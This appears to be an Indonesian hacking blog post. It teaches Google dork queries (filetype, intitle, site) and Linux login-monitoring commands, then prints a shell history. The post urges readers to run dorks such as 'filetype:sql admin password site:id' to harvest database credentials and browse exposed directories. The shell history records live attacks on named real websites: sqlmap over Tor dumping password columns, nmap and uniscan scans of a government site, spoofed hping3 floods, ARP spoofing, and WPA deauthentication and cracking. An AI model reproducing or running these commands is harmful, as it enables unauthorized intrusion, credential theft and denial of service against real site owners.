tulisan download , soal-soal , latihan , ujian , tehnik , elektro , dan
semua terpisah pisah seperti gambar berikut
jika halaman dari google yang keluar sangat
membingungkan kita , ternyata di google ada perintah-perintah yang dapat
memudahkan kita untuk mendapatkan file yang kita inginkan berdasarkan
extensi dari file tersebut perintah itu adalah “filetype” cara
menggunakanya ketikan seperti ini “filetype:pdf” dan enter
lihat yang tampil di google ketika kita ketikan
“filetype:pdf download soal-soal ujian” semua yang akan tampil adalah
documen dengan judul atau kata awal “DOWNLOAD SOAL UJIAN” google mencari
berdasarkan extensi dari file yang akan di download , dan ini sangat
banyak fariasinya ketika di gunakan untuk menggali informasi sebuah
website ataupu data , coba saja merubahnya dengan keyword berikut
“filetype:sql “password” “user” “admin” ” , dan masih banyak falian
lainya menggunakan ini contoh lagi kalian akan menampilkan file MDB
dengan perintah “filetype:db configure , admin , administrator”
jika kalian menginginkan sebuah software yang
sangat susah untuk di temukan gunakan perintah “filetype” untuk
mencarinya , contohnya saya akan mencari software zenmap dengan perintah
berikut “filetype:rar zenmap.rar”
MENCARI INFORMASI TITLE
Setelah membahas tentang mencari file dengan
google key , kali ini akan mencari berdasarkan title pada halaman
website , yang di makasut title ketika kalian mengunjungi situs pasti di
halaman terdapat title halaman tersebut misal halaman login
administartor tang memiliki title login admin atau administrator login ,
mengapa seperti ini bukanya ini juga resiko ? Yaps memang benar kalua
di lihat dari segi keamanan kurang mendukung jika seseorang mendapatkan
password admin dan usernya maka sangat mudah untuk di cari halaman
loginya , dan kenapa para devloper menggunanakan title ini , mungkin
bagi mereka itu supa memudahkan para admin mencari halaman loginya
Dan tehnik mencari berdasarkan title dari sebuah
website dengan menggunakan google juga tidak terlalu susah mirip dengan
perintah-perintah google yang ada di atas , akan tetapi berbeda keyword
yang di gunakanya dalam contoh kali ini kalian akan mencoba mencari
situs-situs yang memiliki title “login administrator” yang menunjukan
halaman login dari administrator
Perintah yang di gunakan ada 2 sama dengan yang di
atas “intitle:” dan juga “allintitle:” perbedaan dari keduanya tidak
terlalu jauh , jika intitle yang di gunakan seperti ini “intitle:login
administrator” maka yang keluar ada kalanya bertitle login , dan
berisikan text admin di bawahnya contoh pada gambar berikut mencari
halaman login dengan title , buka google dan tulis “intitle:login
administrator”
dan coba buka salah satu dari beberapa situs yang
di tampilkan oleh google dan lihat apakah benar situs tersebut memiliki
halaman login dengan title yang kalian masukan ke dalam google tersebut
sedangkan jika kalian menggunakan allintitle maka
google akan menampilkan dengan title yang kalian inputkan ke google ,
contohnya “allintitle:administrator login” maka title yang akan keluar
adalah administrator login
kalian bisa membuka dari hasil yang di tampilkan
oleh google , pilih salah satu halaman website yang tersedia di google
dan lihat halaman apa yang kalian temukan
[Mencari berdasarkan site]
Hmmmmmm jika kalian sudah paham atau tahu tentang
mencari file dan mencari berdasaran url , mencari berdasarkan title ,
kali ini kalian akan mencari berdasarkan site domain, ada banyak sekali
domain-domain negara yang berbeda-beda ini ektensi dari domain yang ada
.ac Ascension Island
.ad Andorra
.ae United Arab Emirates
.af Afghanistan
.ag Antigua and Barbuda
.ai Anguilla
.al Albania
.am Armenia
.an Netherlands Antilles
.ao Angola
.aq Antarctica
.ar Argentina
.as American Samoa
.at Austria
.au Australia
.aw Aruba
.ax Åland
.az Azerbaijan
.ba Bosnia and Herzegovina
.bb Barbados
.bd Bangladesh
.be Belgium
.bf Burkina Faso
.bg Bulgaria
.bh Bahrain
.bi Burundi
.bj Benin
.bm Bermuda
.bn Brunei Darussalam
.bo Bolivia
.br Brazil
.bs Bahamas
.bt Bhutan
.bv Bouvet Island
.bw Botswana
.by Belarus
.bz Belize
.ca Canada
.cc Cocos (Keeling) Islands
.cd Democratic Republic of the Congo tadinya Zaire
.cf Central African Republic
.cg Republic of the Congo
.ch Switzerland
.ci Côte d’Ivoire
.ck Cook Islands
.cl Chile
.cm Cameroon
.cn hanya untuk China Daratan: Hong Kong dan Macau menggunakan TLD berbeda.
.co Colombia
.cr Costa Rica
.cu Cuba
.cv Cape Verde
.cx Christmas Island
.cy Cyprus
.cz Czech Republic
.de Germany (Deutschland)
.dj Djibouti
.dk Denmark
.dm Dominica
.do Dominican Republic
.dz Algeria (Dzayer)
.ec Ecuador
.ee Estonia
.eg Egypt
.er Eritrea
.es Spain (España)
.et Ethiopia
.eu European Union
.fi Finland
.fj Fiji
.fk Falkland Islands
.fm Federated States of Micronesia
.fo Faroe Islands
.fr France
.ga Gabon
.gb United Kingdom jarang digunakan; primary ccTLD yang sering digunakan ialah .uk untuk United Kingdom
.gd Grenada
.ge Georgia
.gf French Guiana
.gg Guernsey
.gh Ghana
.gi Gibraltar
.gl Greenland
.gm The Gambia
.gn Guinea
.gp Guadeloupe
.gq Equatorial Guinea
.gr Greece
.gs South Georgia and the South Sandwich Islands
.gt Guatemala
.gu Guam
.gw Guinea-Bissau
.gy Guyana
.hk Hong Kong Special administrative region dari People’s Republic of China.
.hm Heard Island and McDonald Islands
.hn Honduras
.hr Croatia (Hrvatska)
.ht Haiti
.hu Hungary
.id Indonesia
.ie Ireland (Éire)
.il Israel
.im Isle of Man
.in India
.io British Indian Ocean Territory
.iq Iraq
.ir Iran
.is Iceland (Ísland)
.it Italy
.je Jersey
.jm Jamaica
.jo Jordan
.jp Japan
.ke Kenya
.kg Kyrgyzstan
.kh Cambodia (Khmer)
.ki Kiribati
.km Comoros
.kn Saint Kitts and Nevis
.kp North Korea
.kr South Korea
.kw Kuwait
.ky Cayman Islands
.kz Kazakhstan
.la Laos kini dipasarkan sebagai domain official untuk Los Angeles.
.lb Lebanon
.lc Saint Lucia
.li Liechtenstein
.lk Sri Lanka
.lr Liberia
.ls Lesotho
.lt Lithuania
.lu Luxembourg
.lv Latvia
.ly Libya
.ma Morocco
.mc Monaco
.md Moldova
.me Montenegro
.mg Madagascar
.mh Marshall Islands
.mk Republic of Macedonia
.ml Mali
.mm Myanmar
.mn Mongolia
.mo Macau Special administrative region dari People’s Republic of China.
.mp Northern Mariana Islands
.mq Martinique
.mr Mauritania
.ms Montserrat
.mt Malta
.mu Mauritius
.mv Maldives
.mw Malawi
.mx Mexico
.my Malaysia
.mz Mozambique
.na Namibia
.nc New Caledonia
.ne Niger
.nf Norfolk Island
.ng Nigeria
.ni Nicaragua
.nl Netherlands
.no Norway
.np Nepal
.nr Nauru
.nu Niue Biasa digunakan untuk website-website Scandinavian dan Dutch, karena dalam bahasa mereka ‘nu’ berarti ‘now’.
.nz New Zealand
.om Oman
.pa Panama
.pe Peru
.pf French Polynesia dengan Clipperton Island
.pg Papua New Guinea
.ph Philippines
.pk Pakistan
.pl Poland
.pm Saint-Pierre and Miquelon
.pn Pitcairn Islands
.pr Puerto Rico
.ps Palestinian territories di bawah kontrol PA yang meliputi Tepi Barat (West Bank) dan Jalur Gaza (Gaza Strip)
.pt Portugal
.pw Palau
.py Paraguay
.qa Qatar
.re Réunion
.ro Romania
.rs Serbia
.ru Russia
.rw Rwanda
.sa Saudi Arabia
.sb Solomon Islands
.sc Seychelles
.sd Sudan
.se Sweden
.sg Singapore
.sh Saint Helena
.si Slovenia
.sj Svalbard dan Jan Mayen
.sk Slovakia
.sl Sierra Leone
.sm San Marino
.sn Senegal
.so Somalia
.sr Suriname
.st São Tomé and Príncipe
.su tadinya Soviet Union
.sv El Salvador
.sy Syria
.sz Swaziland
.tc Turks and Caicos Islands
.td Chad
.tf French Southern and Antarctic Lands
.tg Togo
.th Thailand
.tj Tajikistan
.tk Tokelau
.tl East Timor
.tm Turkmenistan
.tn Tunisia
.to Tonga
.tp East Timor
.tr Turkey
.tt Trinidad and Tobago
.tv Tuvalu nama domain yang banyak digunakan oleh stasiun televisi.
.tw Taiwan, Republic of China
.tz Tanzania
.ua Ukraine
.ug Uganda
.uk United Kingdom
.um United States Minor Outlying Islands
.us United States of America Biasa digunakan oleh U.S. State dan local governments daripada TLD .gov
.uy Uruguay
.uz Uzbekistan
.va Vatican City State
.vc Saint Vincent and the Grenadines
.ve Venezuela
.vg British Virgin Islands
.vi U.S. Virgin Islands
.vn Vietnam
.vu Vanuatu
.wf Wallis and Futuna
.ws Samoa tadinya Western Samoa
.ye Yemen
.yt Mayotte
.yu Yugoslavia Kini digunakan untuk Serbia dan Montenegro
.za South Africa (Zuid-Afrika)
.zm Zambia
.zw Zimbabwe
Cara menggunakanya juga tidak rumit , jika kalian
ingin mencari situs-situs negara yamen kalian tinggal inputkan perintah
“site:” di google contohnya inputkan ke google “site:.ye” dan enter ,
lihat semua yang tampil adalah domain-domain yamen
hmmmm menarik bukan ,kalian bisa mencari domain
mana saja dengan menggunakan tehnik site , semua negara terdaftar di
index google , google adalah intelijen yang bersih dan benar-benar tidak
terlihat !!!
[kombinasi penggalina informasi]
Di sini kita akan mencoba menggali informasi
dengan kombinasi perintah-perintah dari google yang menyebabkan kita
dapat menggali informasi dari sebuah website , informasi email ,
informasi file-file sensitive , user password sql server , mencari
data-data yang penting dan tidak di hiraukan terutama di indonesia ini.
Oke kita mukai saja dari yang pertama kita akan
mencari site “id” atau indonesia , dan menggali file-file sql yang dapat
di tampilkan di web-browser kita , kita gunakan saja perintah kombinasi
antara filetype dan site contohnya seperti ini , masukan ke google
perintah “filetype:sql admin password site:id” tanpa tanda kutip
pastinya
Hemmm banyak bukan situs-situs indonesia yang
mudah di gali informasinya , menggunakan google dengan waktu yang
singkat kalian sudah dapat mendapatkan password dan user sql sebuah
website
Dan yang kedua kita coba mencari file file yang
sensitive dalam arti , kita dapat memanfaatkan file tersebut untuk
menembus sebuah system , contohnya ketika kalian mendapatkan file upload
, dan ternyata fileupload dapat di racuni dengan tamper data atau yang
lainya , atau kita dapat menemukan file index-index admin yang ada
Oke berikan kebada google perintah “intitle /index
of admin | index of /filemanager” dan lansung saja eksekusi google dan
lihat apa yang di tampilkan oleh google banyak sekali file yang bisa di
gali dan dapat di gunakan sebagai taham enumerasi atau penggalian
informasi , buka salah satu website yang di tampilkan oleh google
tersebut dan lihat
Fiuuuuuhhh bukan maen kan , kita dapat melihat
directory dan file file yang ada di dalam sebuah server tersebut ,
walaupun kita tidak dapat melihat seutuhnya tapi kita dapat memetakan
directory yang ada di dalam server tersebut dan mencari-cari file yang
tidak seharusnya kita dapatkan
biar lebih jelas tidak di sensor hanya buat
pembelajaran saja oke dan kalian bebas menggunakan keyword google yang
ada , tapi ingat ini hanya server yang bisa di inject dengan cara begini
saja orang kecilpun bisa melakukan nya jadi jangan bangaa oke ! Ada
beberapa combinasi yang adapat menyebabkan serangan ini menjadi lebih
menarik yang dapat menjadi kesalahan yang amat fatal :)
reverensi nya http://www.exploit-db.com/
google tergantung yang menggunakan nya bukan tergantung pada pendidikan
nya :D ada beberapa vuln yang sering di gunakan para hacker untuk
mencari website secara masal dengan vulnerability yang ada , yaitu
sebagai berikut
• vulnerability server
• Data sensitive
• Password access
• download database sql & mdb
masih banyak sekali yang di miliki oleh google
untuk melakukan penggalian informasi selanjut nya akan di bahas di BAB
Social Angineering ( SOCENG )
Melihat kegiatan di server ,laptop , atau PC
Di dalam linux ada beberapa perintah di
console yang memeprmudah kita untuk mencari tau informasi tentang login
sistem atau yang melakukan login ke dalam sistem kita contohnya kita
ingin melihat siapakah yang terakhir kali login ke server dengan
perintah “last” buka terminal kalian dan ketikan “last”
hmm dapat di lihat bukan IP terakhir kali
yang memasuki server kita dan ini semakin mudah untuk
mengidentifikasikan pelaku jika ada penyusup yang mencoba memasuki
server kalian
Multiuser di linux sering di gunakan
untuk cloud server dan banyak yang login untuk mengakses data yang
berada di dalam server tersebut, bagaimana caranya untuk melihat user
siapa saja yang aktif di dalam server tersebut ??? Cukup membuka
terminal atau console dan ketikan “w” atau “who”
18:42:38 up 7 days, 6:08, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 114.79.18.151 18:30 10:16 0.02s 0.02s -bash
root pts/1 114.79.17.25 18:42 0.00s 0.05s 0.03s w
Disitu kalian bisa
melihat user mana saja yang aktif di dalam server kalian, karena penulis
menggunakan server pribadi yang terlihat hanya IP dari satu jaringan
saja,
root pts/0 2014-07-07 18:30 (114.79.18.151)
root pts/1 2014-07-07 18:42 (114.79.17.25)
Atau dengan perintah “ps aux | grep bash | grep pts”
root 20030 0.0 0.0 108344 1816 pts/0 Ss+ 18:30 0:00 -bash
root 20132 0.0 0.0 108344 1820 pts/1 Ss 18:42 0:00 -bash
root 20161 0.0 0.0 103252 804 pts/1 S+ 18:46 0:00 grep bash
Dan kalian bisa melihat aktifitas terahir di dalam server kalian dengan perintah “lastlog” yang kalian inputkan di terminal
Username Port From Latest
root pts/1 114.79.17.25 Mon Jul 7 18:42:33 +0700 2014
bin **Never logged in**
daemon **Never logged in**
adm **Never logged in**
lp **Never logged in**
sync **Never logged in**
shutdown **Never logged in**
halt **Never logged in**
mail **Never logged in**
uucp **Never logged in**
operator **Never logged in**
games **Never logged in**
gopher **Never logged in**
ftp **Never logged in**
nobody **Never logged in**
dbus **Never logged in**
vcsa **Never logged in**
rpc **Never logged in**
abrt **Never logged in**
haldaemon **Never logged in**
ntp **Never logged in**
saslauth **Never logged in**
postfix **Never logged in**
rpcuser **Never logged in**
nfsnobody **Never logged in**
sshd **Never logged in**
tcpdump **Never logged in**
oprofile **Never logged in**
mysql **Never logged in**
apache **Never logged in**
dovecot **Never logged in**
dovenull **Never logged in**
cyrus **Never logged in**
Dan juga bisa menggunakan tools bantu seperti “finger” akan tetapi perlu di isntall terlebih dahulu, jika menggunakan linux centos kalian bisa mendownload “yum finger” dan debian dan ubuntu “apt-get install finger” menggunakanya cukup mudah hanya ketikan di terminal “finger”
Login Name Tty Idle Login Time Office Office Phone
root root pts/0 24 Jul 7 18:30 (114.79.18.151)
root root pts/1 Jul 7 18:42 (114.79.17.25)
Ada
lagi jika kalian ingin melihat kegiatan apa saja yang telah di lakuakan
di server klaian, kalian bisa melihat dengan perintah “history”perintah tersebut akan menampilkan semua kegiatan yang telah di lakukan server kalian lihat hasil inputnya
1823 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 --dbs --tor-port=9050
1824 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 -D munkae --tables --tor-port=9050
1825 sqlmap --random-agent -u
http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T
pageData --colomns --tor-port=9050
1826 sqlmap --random-agent -u
http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T
pageData --columns --tor-port=9050
1827 sqlmap --random-agent -u
http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T
pageData --rider --tor-port=9050
1828 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T rider --columns --tor-port=9050
1829 cd /media/DATA_/icdi/
1830 ls
1831 cd Backup-database/
1832 ls
1833 cd Backup/
1834 ls
1835 cd ..
1836 ls
1837 ls -al
1838 cd
1839 clea r
1840 clear
1841 hping3 --help
1842 arpspoof --help
1843 arpspoof -i wlan0 -t 10.10.10.1 -r 10.10.10.0/24
1844 arpspoof -i wlan0 -t 10.10.10.1 -r 10.10.10.100
1845 virtualbox
1846 wireshark
1847 hping3 --help
1848 hping3 -i u1 -S -p 80 -c 100000 10.10.10.3
1849 hping3 -i wlan0 -S -p 80 -c 100000 10.10.10.3
1850 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood –k
1851 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood --k
1852 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood -k
1853 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood
1854 hping3 -S -p 80 -a 10.10.10.3 -s 80 -- flood -k
1855 hping3 --helpm
1856 hping3 --help
1857 hping3 -i u1 -S -p 80 -c 10 192.168.1.1
1858 hping3 -i u1 -S -p 80 -c 10 10.10.10.1
1859 hping3 -i wlan0 -S -p 80 -c 10 10.10.10.1
1860 hping3 -i wlan0 -S -p * -c 10 10.10.10.1
1861 hping3 -i wlan0 -S -p 123 -c 10 10.10.10.1
1862 hping3 --help
1863 hping3 -S 192.168.1.4 -p 80 -a 192.168.1.4 -s 80 -- flood -k
1864 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.1 -s 80 -- flood -k
1865 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood -k
1866 hping3 -S -p 80 -a 10.10.10.1 -s 80 -- flood -k
1867 hping3 -S -p 80 -a 10.10.10.1 -s 80 -- flood -k
1868 hping3 -s -p 80 -a 10.10.10.1 -s 80 -- flood -k
1869 hping3 -I wlan0 -c 1000000 --faster -S 10.10.10.1
1870 wireshark
1871 service postgresql start
1872 service metasploit start
1873 msfconsole
1874 virtualbox
1875 ping yogya.siap-ppdb.com
1876 nmap -sS -O -sV 118.97.100.130
1877 uniscan -u http://yogya.siap-ppdb.com/ -qw
1878 cd /media/hiburan/film/Die\ Hard\ 4/
1879 ls
1880 unrar -e live-free-or-die-hard-die-hard-40_indonesian-455709.rar
1881 ls
1882 unrar e live-free-or-die-hard-die-hard-40_indonesian-455709.rar
1883 ls
1884 cd
1885 clear
1886 /etc/init.d/tor start
1887 msfweb
1888 setoolkit
1889 service postgresql start
1890 service metasploit start
1891 clear
1892 msfconsole
1893 clear
1894 apt-get install veil
1895 clear
1896 ls -al
1897 nano catatan.txt
1898 setoolkit
1899 cd
1900 clear
1901 theharvester -d kasperskyindonesiapartner.com -l 1000 -b google
1902 apt-get install cryptkeeper
1903 nasm
1904 nasm -h
1905 cd /media/DATA_/N-gative/coding/assambly
1906 ls
1907 cd
1908 clear
1909 cd /media/DATA_/N-gative/coding/assambly/
1910 ls
1911 cp asm-10-evil.txt /tmp/
1912 cd
1913 cd /tmp/
1914 ls
1915 mv asm-10-evil.txt asm-10-evil.asm
1916 ls
1917 nasm -f elf asm-10-evil.asm
1918 nano asm-10-evil.asm
1919 geany asm-10-evil.asm
1920 ld test.o -o test
1921 ld asm-10-evil.o -o asm-10-evil
1922 ls
1923 gcc asm-10-evil.o -o asm-10-evil
1924 ls
1925 cd
1926 killall -9 iceweasel
1927 top
1928 cd /tmp
1929 ls
1930 nano asm-10-evil.asm
1931 nasm -f elf asm-10-evil.asm
1932 geany asm-10-evil.asm
1933 apt-get install masm
1934 geany asm-10-evil.asm
1935 cd
1936 celar
1937 clear
1938 virtualbox
1939 sqlmap --help
1940 /etc/init.d/tor start
1941 clear
1942 sqlmap --random-agent -u http://www.karnaticlabrecords.com/cart.php?id=88 --dbs --tor-port=9050
1943 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 --dbs --tor-port=9050
1944 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D coastal --tables --tor-port=9050
1945 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 --dbs --tor-port=9050
1946 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D ibass --tables --tor-port=9050
1947 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 --dbs --tor-port=9050
1948 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D isword --tables --tor-port=9050
1949 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D mysql --tables --tor-port=9050
1950 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 --dbs --tor-port=9050
1951 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft --tables --tor-port=9050
1952 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users --tor-port=9050
1953 sqlmap --random-agent -u
http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users
--columns --tor-port=9050
1954 sqlmap --random-agent -u
http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users
-C cms_user_passwd -dump --tor-port=9050
1955 sqlmap --random-agent -u
http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users
-C cms_user_passwd --dump --tor-port=9050
1956 ping 202.152.26.149
1957 nmap -Pn -sS -O -sV 202.152.26.149
1958 nmap -Pn -sS -O -sV 202.152.26.144-202.152.26.159
1959 nmap -Pn -sS -O -sV 202.152.26.144 202.152.26.159
1960 clear
1961 nmap -Pn -sS -O -sV 202.152.26.144 202.152.26.159
1962 sqlmap --help
1963 clear
1964 nmap
1965 theharvester -d artajasa.co.id -l 1000 -b google
1966 maltego
1967 top
1968 ping www.kpu-pesisirselatankab.go.id
1969 nmap -sS -O -sV www.kpu-pesisirselatankab.go.id
1970 /etc/init.d/tor start
1971 clear
1972 uniscan -u http://www.kpu-pesisirselatankab.go.id/ -qw
1973 ifconfig
1974 clear
1975 ifconfig wlan0 down
1976 ifconfig
1977 airmon-ng start wlan0
1978 ifconfig
1979 clear
1980 airodump-ng mon0
1981 airodump-ng mon0 --channel 6 --bssid 64:70:02:7D:E0:6E -w /tmp/crack_save
1982 aireplay-ng -0 1 -a 64:70:02:7D:E0:6E -c 00:08:22:E6:B9:FB mon0
1983 clear
1984 ohn --stdout --incremental:all | aircrack-ng -b 64:70:02:7D:E0:6E -w - /tmp/crack_save-01.cap
1985 ifconfig wlan0 up
1986 clear
1987 lynis --help
1988 locate lynis
1989 nano /var/log/lynis.log
1990 locate lynis
1991 lynis --help
1992 lynis -c
1993 /etc/init.d/tor start
1994 clear
1995 netstat
1996 netstat | grep tcp
1997 clear
1998 man netstat
1999 netstats
2000 netstat
2001 history
Banyak sekali bukan yang telah di lakukan di server atau laptop dan PC kalian :) semoga bermanfaat dan membantu untuk belajar :)
Langganan:
Postingan (Atom)